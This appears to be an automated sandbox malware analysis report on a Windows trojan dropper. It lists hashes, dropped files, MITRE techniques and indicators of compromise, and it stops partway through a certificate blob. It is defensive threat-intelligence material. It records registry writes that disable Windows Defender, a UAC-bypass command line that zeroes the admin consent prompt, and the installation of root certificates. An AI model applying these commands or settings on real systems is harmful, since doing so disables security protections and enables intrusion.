52bd35dbb0a393f952096a135fc0d8bddf2892977e72a547f604d53433addfb5

Resubmissions

12-08-2024 19:23

240812-x3zrzazfqd 10

12-08-2024 19:07

240812-xs25cazbpd 10

11-08-2024 02:13

240811-cntl7azfnl 10

Analysis

max time kernel
121s
max time network
125s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
12-08-2024 19:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe
Size

10.1MB
MD5

889956cee776d41937c39e225d3e72b6
SHA1

cc8d22b6c453deb2ac2826610cb001b3dd0e9771
SHA256

52bd35dbb0a393f952096a135fc0d8bddf2892977e72a547f604d53433addfb5
SHA512

2fde4df02392114a2e2676963d05d2a40c748710de7e30dad3deb1083fa1e991c85ae49520d679905ae21eaaed7f0458f38454ce04ea1d6544576f0ca3934de4
SSDEEP

196608:JAw2q0MYZLUFq6f07RGqOu0GIawyGkFk2uH4Fe4Baw0YzDOD0O7TjQq3IZ:76gFNMFuu0GIawyG714B/yD0OPje

Score

10^/10

discovery evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Executes dropped EXE 13 IoCs

pid	Process
1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
2756	Adobe.exe
2720	Adobe.tmp
1912	7z.exe
2620	7z.exe
2588	Set-up.exe
236	7z.exe
2156	7z.exe
2636	7z.exe
1904	7z.exe
2736	7z.exe
3060	7z.exe
2696	7z.exe

Loads dropped DLL 14 IoCs

pid	Process
2368	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe
1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
2756	Adobe.exe
580	cmd.exe
1912	7z.exe
2620	7z.exe
2720	Adobe.tmp
236	7z.exe
2156	7z.exe
2636	7z.exe
1904	7z.exe
2736	7z.exe
3060	7z.exe
2696	7z.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\is-QEF73.tmp	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe	Adobe.tmp
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\is-U3IQ7.tmp	Adobe.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mode.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobe.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Set-up.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
784	PING.EXE
2480	PING.EXE

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Set-up.exe = "11001"	Set-up.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	Set-up.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main	Set-up.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	Set-up.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	Set-up.exe

Modifies registry class 11 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\ms-settings\shell\open\command	reg.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Set-up.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	Set-up.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Set-up.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Set-up.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Set-up.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Set-up.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9e